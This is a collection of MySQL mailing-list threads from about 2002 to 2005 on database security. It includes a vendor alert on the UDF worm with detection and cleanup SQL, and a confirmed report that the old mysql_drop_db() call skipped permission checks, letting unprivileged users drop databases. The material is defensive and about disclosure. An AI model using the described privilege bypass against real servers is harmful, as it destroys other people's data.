Re: about mysql security

[Gleb Paharenko]

Hello.



Searching in the manual didn't return me any pages which have

"five-tiered" inside. If you're interested in MySQL security read

this:

  http://dev.mysql.com/doc/refman/5.0/en/security.html

  http://dev.mysql.com/doc/refman/5.0/en/privilege-system.html





>I get a concept about mysql security. It's named "five-tiered access

>control".Can you tell me the detail of this concept?



wangxu wrote:



-- 
For technical support contracts, goto https://order.mysql.com/?ref=ensita
This email is sponsored by Ensita.NET http://www.ensita.net/
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /Gleb Paharenko
 / /|_/ / // /\ \/ /_/ / /__   [EMAIL PROTECTED]
/_/  /_/\_, /___/\___\_\___/   MySQL AB / Ensita.NET
   <___/   www.mysql.com




-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]

about mysql security

[wangxu]

I get a concept about mysql security. It's named "five-tiered access 
control".Can you tell me the detail of this concept?

Checking MySQL security

[fredzy padzy]

Hello everyone'

I'm interesting and working in IT security and have to do some security test.
Sometime there is a oracle DB, sometime, it's about mySQL.

I found a lot a free scripts'n' tools to check the oracle security
level but i' did not find any for mySQL.

I only found a '.c' file which try to crack the account's passwords.

That's why i write to this mailing list : I wonder if there exists
some tools for mySQL to measure this security ..

hope it does ...

thanks'

--
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]

MySQL Security Alert 2005-01-27

[Arjen Lentz]

There is a bot active on the internet that is infecting Windows machines
running MySQL Server:
  http://isc.sans.org/diary.php?isc=a508f4a185755af19ea8bd45444a570b

An alert with background information is already available on:
  http://dev.mysql.com/tech-resources/articles/security_alert.html

The following message contains practical information about how to
protect your system.


1. What is the UDF Worm?
The UDF Worm is self-propagating code that is finding MySQL servers
running on Microsoft Windows with poor firewall and password security.

This worm does not exploit any bugs in MySQL. It does exploit poor
security setups for firewalls and passwords.

This worm is Microsoft Windows specific, however firewall and password
security is important on any platform.


2. What is a User Defined Function (UDF)?
A User Defined Function, often referred to as a UDF, is a part of the
ANSI SQL-99 specification. This feature allows developers to create
custom functions. It is a common feature among the major database
products.


3. What does the UDF Worm do?
The UDF Worm looks for MySQL servers running on Microsoft Windows that
have been exposed to the internet and have either weak or no passwords
installed on the account named "root". Once it finds an account it
installs a UDF, and then uses that machine to scan for other machines
that can possibly be infected.


4. How do I know if my MySQL installation has been infected?
Run the following SQL statement: SELECT * FROM mysql.func;

If a UDF is found with a name of "app_result" then you have probably
been infected with the worm.

You should look at all UDFs and determine whether or not they are
legitimate. The worm is likely to mutate over time and will take on
different UDF names.

You may be able to remove this UDF by running the following SQL
statement: DROP FUNCTION app_result;
Please note however that this does not not remove the worm itself once
your system has been infected. See the next section for further details.


5. How do I disinfect my system?

As the worm is of a known family called "WootBot" or "SpyBot", most
virus scanners will pick up the executable with their existing
signature files and alert you.
F-Secure provides additional information on this type of "bot" as well
as tools for removing it:
  http://www.f-secure.com/v-descs/wootbot.shtml

To prevent any unauthorized person or program from connecting to your
database you should verify that all of your current accounts have
passwords and that they are strong passwords (i.e. not easily
guess-able). Remember to always use firewalls and strong passwords to
protect your MySQL Servers.

Please consult your security advisors for the best way to protect your
systems.


6. How do I protect my MySQL Servers on Microsoft Windows?
There are 2 basic steps to protect your MySQL Servers:

 1. Always use strong passwords on all accounts.
 2. Use firewalls to protect your MySQL Servers.

The Windows installation procedure in MySQL 4.1 and up takes additional
steps to ensure that users create a secure setup.

For information about securing your root account on an existing
installation, see 
http://dev.mysql.com/doc/mysql/en/default-privileges.html and 
http://dev.mysql.com/doc/mysql/en/security-against-attack.html.

Specifically, ensure that the root account has a STRONG password that
cannot be easily guessed.

Also, remove the root@'%' account from the grant tables. Connect to the
MySQL server as root, the following example uses the 'mysql' command
line client. Search for "mysql.exe" in on your hard drive, and Run this
program with the parameters "-u root -p".

Enter password: *
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 4.1.9-nt

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> DELETE FROM mysql.user WHERE host = '%' AND user = 'root';
Query OK, 1 row affected (0.03 sec)

mysql> FLUSH PRIVILEGES;
Query OK, 0 rows affected (0.05 sec)

mysql> quit

This will prevent root logins from other machines.

If you don't require any access to the database server from other
machines, you can even disable networking completely by using the
skip-networking option in your configuration file and restarting the
server. You can also use MySQL Administrator to edit your MySQL
configuration. Local connections are handled via named pipes on an NT
based system (Windows NT4, 2000, XP, 2003).


7. Is this a vulnerability on Microsoft Windows, Linux, or Unix?
This worm is Microsoft Windows specific, however firewall and password
security is important on any platform. 

If your server is behind a firewall, and you have a strong root password
you are not vulnerable to this worm. If not, take the necesscary steps
now to protect your system.

Learn more about strong passwords and firewall setups for Microsoft
Windows here:
http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/windows_password_tips.mspx

http://www.

Re: About Mysql Security

[Egor Egorov]

Mike Bao <[EMAIL PROTECTED]> wrote:

> Last week, the all tables in one database had been deleted, which is
> second times since I upgrade my operation system from NT 4.0 to Server
> 2003. Before that, they had been deleted many times.
> 
> I just copied all table files to one database(one directory). They
> will work normally. I don't know my operation is correct or not. And I
> want to get more suggestions about mysql security, more details
> better.
> 
> Look forward to hearing from you, thanks lot.

To ask a correct question you should know half of the answer. :) 

For your case, do FLUSH TABLES and LOCK TABLES before taking 
the files snapshot. 

Or, even better, use mysqlhotcopy. 





-- 
For technical support contracts, goto https://order.mysql.com/?ref=ensita
This email is sponsored by Ensita.net http://www.ensita.net/
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /Egor Egorov
 / /|_/ / // /\ \/ /_/ / /__   [EMAIL PROTECTED]
/_/  /_/\_, /___/\___\_\___/   MySQL AB / Ensita.net
   <___/   www.mysql.com




-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]

About Mysql Security

[Mike Bao]

Hi,

Last week, the all tables in one database had been deleted, which is
second times since I upgrade my operation system from NT 4.0 to Server
2003. Before that, they had been deleted many times.

I just copied all table files to one database(one directory). They
will work normally. I don't know my operation is correct or not. And I
want to get more suggestions about mysql security, more details
better.

Look forward to hearing from you, thanks lot.

Michael

-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]

Re: MySQL Security

[Egor Egorov]

Sheraz <[EMAIL PROTECTED]> wrote:

> How can i achieve Security acpect in mysql?
> How secure can we make transactions over internet for
> 3306 ?

Use SSL. 





-- 
For technical support contracts, goto https://order.mysql.com/?ref=ensita
This email is sponsored by Ensita.net http://www.ensita.net/
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /Egor Egorov
 / /|_/ / // /\ \/ /_/ / /__   [EMAIL PROTECTED]
/_/  /_/\_, /___/\___\_\___/   MySQL AB / Ensita.net
   <___/   www.mysql.com




-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]

MySQL Security

[Sheraz]

How can i achieve Security acpect in mysql?
How secure can we make transactions over internet for
3306 ?


Thanks
Sak



__
Do you Yahoo!?
Yahoo! Mail - 50x more storage than other providers!
http://promotions.yahoo.com/new_mail

-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]

Re: MYSQL Security

[Timotius Alfa]

Thank you Victoria and Mikhail. 
 
thanks a lot 

Victoria Reznichenko <[EMAIL PROTECTED]> wrote:
Timotius Alfa wrote:
> 
> Hi All, 
> 
> I'm newbie in MYSQL. Would please tell me about Mysql Security ? 
> 
> I used Windows2000 for mysql server. 
> 

Privilege system of MySQL is described in the following section of the manual:
http://www.mysql.com/doc/en/Privilege_system.html



-- 
For technical support contracts, goto https://order.mysql.com/?ref=ensita
This email is sponsored by Ensita.net http://www.ensita.net/
__ ___ ___  __
/ |/ /_ __/ __/ __ \/ / Victoria Reznichenko
/ /|_/ / // /\ \/ /_/ / /__ [EMAIL PROTECTED]
/_/ /_/\_, /___/\___\_\___/ MySQL AB / Ensita.net
<___/ www.mysql.com





-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe: http://lists.mysql.com/[EMAIL PROTECTED]


-
Do you Yahoo!?
Yahoo! SiteBuilder - Free web site building tool. Try it!

Re: MYSQL Security

[Victoria Reznichenko]

Timotius Alfa <[EMAIL PROTECTED]> wrote:
> 
> Hi All, 
> 
> I'm newbie in MYSQL. Would please tell me about Mysql Security ? 
> 
> I used Windows2000 for mysql server. 
> 

Privilege system of MySQL is described in the following section of the manual:
http://www.mysql.com/doc/en/Privilege_system.html



-- 
For technical support contracts, goto https://order.mysql.com/?ref=ensita
This email is sponsored by Ensita.net http://www.ensita.net/
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /Victoria Reznichenko
 / /|_/ / // /\ \/ /_/ / /__   [EMAIL PROTECTED]
/_/  /_/\_, /___/\___\_\___/   MySQL AB / Ensita.net
   <___/   www.mysql.com





-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]

Re: MYSQL Security

[Mikhail Entaltsev]

Hi,

> I'm newbie in MYSQL. Would please tell me about Mysql Security ? 

Generally you can find a lot of information about MySQL on 
http://www.mysql.com/doc/en/

About your question you can read here:
http://www.mysql.com/doc/en/Privilege_system.html

Mikhail.

- Original Message - 
From: "Timotius Alfa" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, January 28, 2004 5:16 AM
Subject: MYSQL Security


> 
> 
> Hi All, 
> 
> I'm newbie in MYSQL. Would please tell me about Mysql Security ? 
> 
> I used Windows2000 for mysql server. 
> 
> thank you 
> 
>  
> 
> 
> -
> Do you Yahoo!?
> Yahoo! SiteBuilder - Free web site building tool. Try it!

-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]

MYSQL Security

[Timotius Alfa]

Hi All, 

I'm newbie in MYSQL. Would please tell me about Mysql Security ? 

I used Windows2000 for mysql server. 

thank you 

 


-
Do you Yahoo!?
Yahoo! SiteBuilder - Free web site building tool. Try it!

RE: MySQL & security

[Michael Shulman]

In your "user" table in the mysql database, remove all the lines that allow
logins from other hosts.

mysql> use mysql
mysql> delete from user where host <> "localhost;
mysql> flush privileges;

-ms


-Original Message-
From: Mel [mailto:[EMAIL PROTECTED] 
Sent: Saturday, April 05, 2003 9:38 AM
To: [EMAIL PROTECTED]
Subject: MySQL & security


I'm running MySQL 4.0.12-standard on Mac OS X (10.2.4), for local use 
only. As no-one else needs access to the database, I'm trying to make 
it as secure as possible... so far I've added skip-name-resolve, 
skip-networking and safe-user-create into my.cnf. I've also seen 
bind-ip=127.0.0.1 mentioned a few times as well, but I'm not sure if 
this is needed if skip-networking is set, or if one over-rides the 
other?

As you can probably tell, I'm on the new side to this, so any help or 
advice is appreciated.

TIA!

Mel

-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]



-- 
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]

MySQL & security

[Mel]

I'm running MySQL 4.0.12-standard on Mac OS X (10.2.4), for local use 
only. As no-one else needs access to the database, I'm trying to make 
it as secure as possible... so far I've added skip-name-resolve, 
skip-networking and safe-user-create into my.cnf. I've also seen 
bind-ip=127.0.0.1 mentioned a few times as well, but I'm not sure if 
this is needed if skip-networking is set, or if one over-rides the 
other?

As you can probably tell, I'm on the new side to this, so any help or 
advice is appreciated.

TIA!

Mel

--
MySQL General Mailing List
For list archives: http://lists.mysql.com/mysql
To unsubscribe:http://lists.mysql.com/[EMAIL PROTECTED]

Re: MySQL Security Flaw - Dropped Databases

[Lenz Grimmer]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

On Thu, 19 Dec 2002, Michael Widenius wrote:

> With 'DROP DATABASE database_name'.
> Through the depricated client function 'mysql_drop_db()'.
>
> The first case works correct but in the second case the grant check
> is not done.  I tracked this down to a merge I did between the 4.0 and
> 4.1 code in September last year :(
>
> The reson you could not repeat this is that MySQLFront() uses the old
> mysql_drop_db() call while you probably tested this with some client
> which uses the new way to drop a database.
>
> I will fix this at once for next 4.0 release. Thanks for reporting this!

JFYI: this bug was fixed in MySQL 4.0.7, which will be available shortly
(just uploading the files to give the mirrors some time to sync). A full
announcement will be sent out on Friday.

Happy holidays!

Bye,
LenZ
- -- 
For technical support contracts, visit https://order.mysql.com/?ref=mlgr
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /  Mr. Lenz Grimmer <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__ MySQL AB, Production Engineer
/_/  /_/\_, /___/\___\_\___/ Hamburg, Germany
   <___/   www.mysql.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.0 (GNU/Linux)
Comment: For info see http://quantumlab.net/pine_privacy_guard/

iD8DBQE+CGmZSVDhKrJykfIRAg0jAJ0VJySvCpAObrAXGTJuuLh1MNsa7wCfYPjm
u9zaoIaFnbn/sJrNbyls1Ck=
=sV/x
-END PGP SIGNATURE-


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

MySQL Security Flaw - Dropped Databases

[Michael Widenius]

Hi!


Mark> Hi,

Gary>  I'd like to add to the "security flaw" thread with my own experience.
Gary> I have been hosting MySQL databases for over 2 years and on a few occasions
Gary> have had user databases disappear.

Gary>  Last month one of my admin databases was dropped.  The only user 
Gary> who has
Gary> access to that database is root (me) and even after double checking all my
Gary> scripts/code and database/table permissions I was unable to determine how it
Gary> was done.  I was able to track down the culprit and asked him how he did it.
Gary> He replied:

Gary>"When use MySQL-Front(version 2.5) as client to connect to 4.x version
Gary> MySQL server,any users(even without any granted rights) can drop any
Gary> databases. I guess there is a horrible security hole exist in MySQL 4.x
Gary> version."

Gary> I don't really understand this client side exploit, nevertheless, the
Gary> database WAS dropped and that is how he told me he did it.  Is this a red
Gary> herring (false lead)?   If it is true, is this exploit being addressed?

I checked this up and notice that your user is right.

In MySQL we have two different ways to drop a database:

With 'DROP DATABASE database_name'.
Through the depricated client function 'mysql_drop_db()'.

The first case works correct but in the second case the grant check
is not done.  I tracked this down to a merge I did between the 4.0 and
4.1 code in September last year :(

The reson you could not repeat this is that MySQLFront() uses the old
mysql_drop_db() call while you probably tested this with some client
which uses the new way to drop a database.

I will fix this at once for next 4.0 release. Thanks for reporting this!

Regards,
Monty

-- 
MySQL 2003 Users Conference -> http://www.mysql.com/events/uc2003/
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /Mr. Michael Widenius <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__   MySQL AB, CTO
/_/  /_/\_, /___/\___\_\___/   Helsinki, Finland
   <___/   www.mysql.com

-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL security flaws uncovered

[Stefan Hinz, iConnect \(Berlin\)]

Csongor, Michael:

>> Maybe they're taking the MS route.

> I second this. These vulnerabilities are serious, they must be given
> more attention. Apache, PHP, RedHat and so on and so on are very careful
> with issues like this, all vulnerabilities/exploits are immediately
> published through all possible channels.

Have a look at the website of the person who uncovered the security flaw:


Vendor Response
03. December 2002 Vendor was contacted by email.
04. December 2002 Vendor informs me that bugs are fixed and that they
started building new packages.
12. December 2002 Vendor has released MySQL 3.23.54 which fixes these
vulnerabilities.


Doesn't look like the "MS way" to me. See for yourselves:

http://security.e-matters.de/advisories/042002.html

Regards,
--
  Stefan Hinz <[EMAIL PROTECTED]>
  CEO / Geschäftsleitung iConnect GmbH <http://iConnect.de>
  Heesestr. 6, 12169 Berlin (Germany)
  Telefon: +49 30 7970948-0  Fax: +49 30 7970948-3


- Original Message -
From: "Csongor Fagyal" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Wednesday, December 18, 2002 11:33 AM
Subject: Re: MySQL security flaws uncovered


> Michael She wrote:
>
> > It's bad for business : )
> >
> > Maybe they're taking the MS route.
>
> I second this. These vulnerabilities are serious, they must be given
> more attention. Apache, PHP, RedHat and so on and so on are very careful
> with issues like this, all vulnerabilities/exploits are immediately
> published through all possible channels. Yes, it is always a pain to
> find out something like this, obviously the MySQL team just would like
> to forget this once and for all, but doing troublesome
> reinstalls/upgrades and so on is still better then getting our system
> hacked.
>
> - Cs.
>
> >
> >
> >
> > At 12:19 AM 12/18/2002 -0500, Michael Bacarella wrote:
> >
> >> A good question posted to another list..
> >>
> >>  forwarded message follows 
> >>
> >> > Several vulnerabilities have been found in the MySQL database system,
a
> >> > light database package commonly used in Linux environments but
> >> which runs
> >> > also on Microsoft platforms, HP-Unix, Mac OS and more.
> >> > http://zdnet.com.com/2100-1104-977958.html
> >>
> >> So why no mention on the MySQL.COM site?  That rather bugs me.  In
> >> contrast,
> >> sites for products like Apache or Bind are very clear about
current/past
> >> security issues.
> >>
> >> Is MySQL.COM the wrong place?
> >


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

RE: MySQL security flaws uncovered

[Adam Nelson]

The real problem is the lack of a central knowledgebase.  Is there one
that I'm not aware of?  Even if there is, it should be very obvious off
the front page of the website.

> -Original Message-
> From: Csongor Fagyal [mailto:[EMAIL PROTECTED]] 
> Sent: Wednesday, December 18, 2002 5:34 AM
> To: [EMAIL PROTECTED]
> Subject: Re: MySQL security flaws uncovered
> 
> 
> Michael She wrote:
> 
> > It's bad for business : )
> >
> > Maybe they're taking the MS route.
> 
> I second this. These vulnerabilities are serious, they must be given 
> more attention. Apache, PHP, RedHat and so on and so on are 
> very careful 
> with issues like this, all vulnerabilities/exploits are immediately 
> published through all possible channels. Yes, it is always a pain to 
> find out something like this, obviously the MySQL team just 
> would like 
> to forget this once and for all, but doing troublesome 
> reinstalls/upgrades and so on is still better then getting our system 
> hacked.
> 
> - Cs.
> 
> >
> >
> >
> > At 12:19 AM 12/18/2002 -0500, Michael Bacarella wrote:
> >
> >> A good question posted to another list..
> >>
> >>  forwarded message follows 
> >>
> >> > Several vulnerabilities have been found in the MySQL 
> database system, a
> >> > light database package commonly used in Linux environments but 
> >> which runs
> >> > also on Microsoft platforms, HP-Unix, Mac OS and more.
> >> > http://zdnet.com.com/2100-1104-977958.html
> >>
> >> So why no mention on the MySQL.COM site?  That rather bugs me.  In 
> >> contrast,
> >> sites for products like Apache or Bind are very clear 
> about current/past
> >> security issues.
> >>
> >> Is MySQL.COM the wrong place?
> >
> 
> 
> 
> 


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL Security Flaw - Dropped Databases

[Lenz Grimmer]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi,

thanks for your message.

On Wed, 18 Dec 2002, Gary Huntress wrote:

> I'd like to add to the "security flaw" thread with my own experience. I
> have been hosting MySQL databases for over 2 years and on a few
> occasions have had user databases disappear.
>
> Last month one of my admin databases was dropped.  The only user who has
> access to that database is root (me) and even after double checking all
> my scripts/code and database/table permissions I was unable to determine
> how it was done.  I was able to track down the culprit and asked him how
> he did it. He replied:
>
> "When use MySQL-Front(version 2.5) as client to connect to 4.x version
> MySQL server,any users(even without any granted rights) can drop any
> databases. I guess there is a horrible security hole exist in MySQL 4.x
> version."
>
> I don't really understand this client side exploit, nevertheless, the
> database WAS dropped and that is how he told me he did it.  Is this a
> red herring (false lead)?  If it is true, is this exploit being
> addressed?

Well, we can only address what we get informed about! In the future, it
would be good if you could inform us about such potential security
problems by sending your message to our mail address [EMAIL PROTECTED]

I've not heard about this specific issue before, but will forward it to
our developers for further analysis.

Thanks,

LenZ
- -- 
For technical support contracts, visit https://order.mysql.com/?ref=mlgr
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /  Mr. Lenz Grimmer <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__ MySQL AB, Production Engineer
/_/  /_/\_, /___/\___\_\___/ Hamburg, Germany
   <___/   www.mysql.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.0 (GNU/Linux)
Comment: For info see http://quantumlab.net/pine_privacy_guard/

iD8DBQE+AILsSVDhKrJykfIRAlXdAJ49jfET5L9cYUqmw4eTFzTM9/rGFwCeNS3S
Dm8IF2byWxNbdgzvrBNWG+s=
=jKLg
-END PGP SIGNATURE-


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

MySQL Security Flaw - Dropped Databases

[Gary Huntress]

Hi,

I'd like to add to the "security flaw" thread with my own experience.
I have been hosting MySQL databases for over 2 years and on a few occasions
have had user databases disappear.

Last month one of my admin databases was dropped.  The only user who has
access to that database is root (me) and even after double checking all my
scripts/code and database/table permissions I was unable to determine how it
was done.  I was able to track down the culprit and asked him how he did it.
He replied:

  "When use MySQL-Front(version 2.5) as client to connect to 4.x version
MySQL server,any users(even without any granted rights) can drop any
databases. I guess there is a horrible security hole exist in MySQL 4.x
version."

I don't really understand this client side exploit, nevertheless, the
database WAS dropped and that is how he told me he did it.  Is this a red
herring (false lead)?   If it is true, is this exploit being addressed?


Regards,
Gary "SuperID" Huntress
===
FreeSQL.org offering free database hosting to developers
Visit http://www.freesql.org


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL security flaws uncovered

[Lenz Grimmer]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Wed, 18 Dec 2002, Csongor Fagyal wrote:

> Michael She wrote:
>
> > It's bad for business : )
> > Maybe they're taking the MS route.
>
> I second this. These vulnerabilities are serious, they must be given
> more attention. Apache, PHP, RedHat and so on and so on are very careful
> with issues like this, all vulnerabilities/exploits are immediately
> published through all possible channels. Yes, it is always a pain to
> find out something like this, obviously the MySQL team just would like
> to forget this once and for all, but doing troublesome
> reinstalls/upgrades and so on is still better then getting our system
> hacked.

No, this is definately not the case. As I've written in a separate
message, we immediately reacted and released 3.23.54 to resolve this
issue. The security problem was clearly mentioned in the release
announcement that was posted to our announce mailing list:

http://lists.mysql.com/cgi-ez/ezmlm-cgi?2:mss:144:200212:cedhfgmdkobfodelamkh

But I fully agree - in this case the release announcement should have been
put up on the web site as well. This was an error on our side and it will
not happen again.

We will send out another (more public) announcement later today, which
will also be put up on the web pages.

Bye,
LenZ
- -- 
For technical support contracts, visit https://order.mysql.com/?ref=mlgr
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /  Mr. Lenz Grimmer <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__ MySQL AB, Production Engineer
/_/  /_/\_, /___/\___\_\___/ Hamburg, Germany
   <___/   www.mysql.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.0 (GNU/Linux)
Comment: For info see http://quantumlab.net/pine_privacy_guard/

iD8DBQE+AG9dSVDhKrJykfIRAnvDAJ9gmSFlvz5s5Uj+KJryW/xRjUeOiwCfUXsr
SQosoQaAyX/msQye8itk12k=
=dPgn
-END PGP SIGNATURE-


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL security flaws uncovered

[Csongor Fagyal]

Michael She wrote:


It's bad for business : )

Maybe they're taking the MS route.


I second this. These vulnerabilities are serious, they must be given 
more attention. Apache, PHP, RedHat and so on and so on are very careful 
with issues like this, all vulnerabilities/exploits are immediately 
published through all possible channels. Yes, it is always a pain to 
find out something like this, obviously the MySQL team just would like 
to forget this once and for all, but doing troublesome 
reinstalls/upgrades and so on is still better then getting our system 
hacked.

- Cs.




At 12:19 AM 12/18/2002 -0500, Michael Bacarella wrote:


A good question posted to another list..

 forwarded message follows 

> Several vulnerabilities have been found in the MySQL database system, a
> light database package commonly used in Linux environments but 
which runs
> also on Microsoft platforms, HP-Unix, Mac OS and more.
> http://zdnet.com.com/2100-1104-977958.html

So why no mention on the MySQL.COM site?  That rather bugs me.  In 
contrast,
sites for products like Apache or Bind are very clear about current/past
security issues.

Is MySQL.COM the wrong place?






-
Before posting, please check:
  http://www.mysql.com/manual.php   (the manual)
  http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL security flaws uncovered

[Michael She]

It's bad for business : )

Maybe they're taking the MS route.


At 12:19 AM 12/18/2002 -0500, Michael Bacarella wrote:

A good question posted to another list..

 forwarded message follows 

> Several vulnerabilities have been found in the MySQL database system, a
> light database package commonly used in Linux environments but which runs
> also on Microsoft platforms, HP-Unix, Mac OS and more.
> http://zdnet.com.com/2100-1104-977958.html

So why no mention on the MySQL.COM site?  That rather bugs me.  In contrast,
sites for products like Apache or Bind are very clear about current/past
security issues.

Is MySQL.COM the wrong place?

--
Michael Bacarella  | Netgraft Corp
   | 545 Eighth Ave #401
 Systems Analysis  | New York, NY 10018
Technical Support  | 212 946-1038 | 917 670-6982
 Managed Services  | http://netgraft.com/


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail 
<[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

--
Michael She  : [EMAIL PROTECTED]
Mobile   : (519) 589-7309
WWW Homepage : http://www.binaryio.com/


-
Before posting, please check:
  http://www.mysql.com/manual.php   (the manual)
  http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

Re: MySQL security flaws uncovered

[Lenz Grimmer]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Wed, 18 Dec 2002, Michael Bacarella wrote:

> A good question posted to another list..
>
>  forwarded message follows 
>
> > Several vulnerabilities have been found in the MySQL database system,
> > a light database package commonly used in Linux environments but which
> > runs also on Microsoft platforms, HP-Unix, Mac OS and more.
> > http://zdnet.com.com/2100-1104-977958.html
>
> So why no mention on the MySQL.COM site?  That rather bugs me.  In
> contrast, sites for products like Apache or Bind are very clear about
> current/past security issues.
>
> Is MySQL.COM the wrong place?

No, it was an internal communication problem - this was the first time I
had to handle a security problem and I was not aware, that our PR team did
not catch my internal message about the security vulnerability. We will
send out an announcement today, which will also be put on the web pages.
You can find my initial announcement here:

http://lists.mysql.com/cgi-ez/ezmlm-cgi?2:mss:144:200212:cedhfgmdkobfodelamkh

Sorry for the confusion - next time I hope to get it straight at once.

Bye,
LenZ
- -- 
For technical support contracts, visit https://order.mysql.com/?ref=mlgr
   __  ___ ___   __
  /  |/  /_ __/ __/ __ \/ /  Mr. Lenz Grimmer <[EMAIL PROTECTED]>
 / /|_/ / // /\ \/ /_/ / /__ MySQL AB, Production Engineer
/_/  /_/\_, /___/\___\_\___/ Hamburg, Germany
   <___/   www.mysql.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.0 (GNU/Linux)
Comment: For info see http://quantumlab.net/pine_privacy_guard/

iD8DBQE+ACX8SVDhKrJykfIRAgbBAJ9hI3CXVhnExGKnIR76eA/XqpJyiQCfZhHP
iB3kePO5YLRO+6wt5Lv5Qf4=
=M4MK
-END PGP SIGNATURE-


-
Before posting, please check:
   http://www.mysql.com/manual.php   (the manual)
   http://lists.mysql.com/   (the list archive)

To request this thread, e-mail <[EMAIL PROTECTED]>
To unsubscribe, e-mail <[EMAIL PROTECTED]>
Trouble unsubscribing? Try: http://lists.mysql.com/php/unsubscribe.php

MySQL security flaws uncovered

[Michael Bacarella]

A good question posted to another list..

 forwarded message follows 

> Several vulnerabilities have been found in the MySQL database system, a
> light database package commonly used in Linux environments but which runs
> also on Microsoft platforms, HP-Unix, Mac OS and more.
> http://zdnet.com.com/2100-1104-977958.html

So why no mention on the MySQL.COM site?  That rather bugs me.  In contrast, 
sites for products like Apache or Bind are very clear about current/past 
security issues.

